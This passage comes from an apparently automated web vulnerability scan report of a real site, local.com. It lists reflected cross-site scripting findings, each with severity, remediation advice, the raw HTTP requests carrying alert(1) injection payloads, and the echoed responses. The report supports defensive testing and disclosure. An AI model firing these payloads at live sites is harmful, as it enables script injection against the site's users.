Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1062
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:17 GMT
Connection: close
Content-Length: 1062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100fc52c';alert(1)//d85ccbd701b;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" type="text/javascript">
...[SNIP]...

2.18. http://www.local.com/events/category/music/dallas-tx.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/music/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c9e7'-alert(1)-'22f4ee6710f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/music/dallas-tx.aspx?8c9e7'-alert(1)-'22f4ee6710f=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 92920
Date: Thu, 03 Feb 2011 16:51:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:57 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 92920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Concerts Events | Find
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=music&8c9e7'-alert(1)-'22f4ee6710f=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

2.19. http://www.local.com/events/category/performing-arts/dallas-tx.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/performing-arts/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e4c'-alert(1)-'1c8163cafb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/performing-arts/dallas-tx.aspx?60e4c'-alert(1)-'1c8163cafb2=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 87882
Date: Thu, 03 Feb 2011 16:51:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:17 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 87882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Theatre and Comedy Eve
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=performing_arts&60e4c'-alert(1)-'1c8163cafb2=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

2.20. http://www.local.com/events/category/sports/dallas-tx.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/sports/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d6b'-alert(1)-'8080df3d42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/sports/dallas-tx.aspx?66d6b'-alert(1)-'8080df3d42=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 89105
Date: Thu, 03 Feb 2011 16:49:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:49:18 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 89105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Sports Events | Find S
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=sports&66d6b'-alert(1)-'8080df3d42=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

2.21. http://www.local.com/results.aspx [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d27c6"%3b652d94a4b4b was submitted in the cid parameter. This input was echoed as d27c6";652d94a4b4b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /results.aspx?keyword=banks&cid=506d27c6"%3b652d94a4b4b&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 131999
Date: Thu, 03 Feb 2011 15:56:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=0tqwfcmc1mz4bv45earm1z55; path=/; HttpOnly
Set-Cookie: localcom=cid=506d27c6";652d94a4b4b&loc=Dallas%2c+TX&kw=banks&uid=a555a31b-b16a-44e4-835f-482623ce13b9&expdate=634349085792409448&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506d27c6%22%253b652d94a4b4b%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:19 GMT; path=/
Set-Cookie: localcom_s=cid=506d27c6";652d94a4b4b&exp=634323183792409448; domain=local.com; expires=Thu, 03-Feb-2011 16:26:19 GMT; path=/
Content-Length: 131999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
prop1="banks";
s.prop2="";
s.prop4="Dallas, TX";
s.prop5="v3:Businesses - SERP - SEM";
s.prop8="";
s.campaign = "506d27c6";652d94a4b4b";
s.eVar1="v3:Businesses - SERP - SEM";
s.eVar5="v3:Businesses - SERP - SEM";
s.eVar6="Retail Banks";
s.eVar11="506d27c6";652d94a4b4
...[SNIP]...

2.22. http://www.local.com/results.aspx [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c80ba"style%3d"x%3aexpression(alert(1))"45503434253 was submitted in the cid parameter. This input was echoed as c80ba"style="x:expression(alert(1))"45503434253 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506c80ba"style%3d"x%3aexpression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 133517
Date: Thu, 03 Feb 2011 15:56:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; path=/; HttpOnly
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; domain=local.com; expires=Thu, 03-Feb-2011 16:26:17 GMT; path=/
Content-Length: 133517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506c80ba"style="x:expression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

2.23. http://www.local.com/results.aspx [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a134f"style%3d"x%3aexpression(alert(1))"fccc9411126 was submitted in the client parameter. This input was echoed as a134f"style="x:expression(alert(1))"fccc9411126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style%3d"x%3aexpression(alert(1))"fccc9411126 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 131540
Date: Thu, 03 Feb 2011 15:56:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=en03gt2mbtrg5hymvlucfg2l; path=/; HttpOnly
Set-Cookie: localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=41e9b545-7b15-424c-972c-65baecb81534&expdate=634349085968705455&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_jsa134f%22style%253d%22x%253aexpression(alert(1))%22fccc9411126&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:36 GMT; path=/
Set-Cookie: localcom_s=cid=506&exp=634323183968705455; domain=local.com; expires=Thu, 03-Feb-2011 16:26:36 GMT; path=/
Content-Length: 131540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style="x:expression(alert(1))"fccc9411126&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

2.24. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a378"style="x:expression(alert(1))"043ffc8a60a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 130504
Date: Thu, 03 Feb 2011 15:56:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=bzp0h255qcweve45j0rd4z55; path=/; HttpOnly
Set-Cookie: localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=639a705c-136b-485f-8a3e-16b57e26ba7b&expdate=634349086150332423&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_js%269a378%22style%253d%22x%253aexpression(alert(1))%22043ffc8a60a%3d1&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:55 GMT; path=/
Set-Cookie: localcom_s=cid=506&exp=634323184150332423; domain=local.com; expires=Thu, 03-Feb-2011 16:26:55 GMT; path=/
Content-Length: 130504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style="x:expression(alert(1))"043ffc8a60a=1&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

2.25. http://www.local.com/topics/ [keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /topics/

Issue detail

The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f6f"%3bb0022a17af6 was submitted in the keyword parameter. This input was echoed as b0f6f";b0022a17af6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topics/?topic=food&keyword=foodb0f6f"%3bb0022a17af6 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 33965
Date: Thu, 03 Feb 2011 16:51:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:21 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&topics.kw=foodb0f6f%22%3bb0022a17af6; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 33965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cooking, Nutrition and Food A
...[SNIP]...
<script type="text/javascript">
s.pageName="Topics - Landing - Food";
s.prop1="foodb0f6f";b0022a17af6";
s.prop2="";
s.prop4="Dallas, TX";
s.prop5="v3:Topics - Landing - Food";
s.prop8="Organic";
s.campaign = "506c80ba
...[SNIP]...

2.26. http://www.local.com/ver1.0/Direct/Jsonp [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 8cbb2<script>alert(1)</script>2eab8d1e87a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

